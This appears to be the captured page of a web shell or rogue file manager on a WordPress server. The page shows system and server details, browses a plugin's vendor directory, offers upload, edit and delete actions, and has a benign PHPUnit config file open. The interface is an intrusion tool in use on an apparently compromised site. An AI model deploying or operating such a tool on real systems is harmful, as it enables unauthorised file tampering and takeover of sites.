[ SYSTEM ]: Linux wordpress 6.1.0-44-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.164-1 (2026-03-09) x86_64
[ SERVER ]: Apache/2.4.66 (Debian) | PHP: 8.2.30
[ USER ]: www-data | IP: 172.19.30.54
GEFORCE FILE MANAGER
/
var
/
www
/
html
/
wordpress
/
wp-content
/
plugins
/
wp-optimize
/
vendor
/
rosell-dk
/
exec-with-fallback
/
UPLOAD:
NAME
SIZE
QUICK PERMS
ACTIONS
📁 src
SET
[ DEL ]
📄 LICENSE
35,149 B
SET
[ EDIT ]
|
[ DEL ]
📄 README.md
6,374 B
SET
[ EDIT ]
|
[ DEL ]
📄 composer.json
2,316 B
SET
[ EDIT ]
|
[ DEL ]
📄 phpstan.neon
84 B
SET
[ EDIT ]
|
[ DEL ]
📄 phpunit.xml.dist
946 B
SET
[ EDIT ]
|
[ DEL ]
📄 phpunit.xml.dist.bak
972 B
SET
[ EDIT ]
|
[ DEL ]
📄 test.php
237 B
SET
[ EDIT ]
|
[ DEL ]
DELETE SELECTED
[ CLOSE ]
EDIT: phpunit.xml.dist
<?xml version="1.0" encoding="UTF-8"?> <phpunit xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" bootstrap="vendor/autoload.php" backupGlobals="false" backupStaticAttributes="false" colors="true" verbose="true" convertErrorsToExceptions="true" convertNoticesToExceptions="true" convertWarningsToExceptions="true" processIsolation="false" stopOnFailure="false" xsi:noNamespaceSchemaLocation="https://schema.phpunit.de/9.3/phpunit.xsd"> <coverage> <include> <directory suffix=".php">src/</directory> </include> <report> <clover outputFile="build/logs/clover.xml"/> <html outputDirectory="build/coverage"/> <text outputFile="build/coverage.txt"/> </report> </coverage> <testsuites> <testsuite name=":vendor Test Suite"> <directory suffix="Test.php">./tests/</directory> </testsuite> </testsuites> <logging> <junit outputFile="build/report.junit.xml"/> </logging> </phpunit>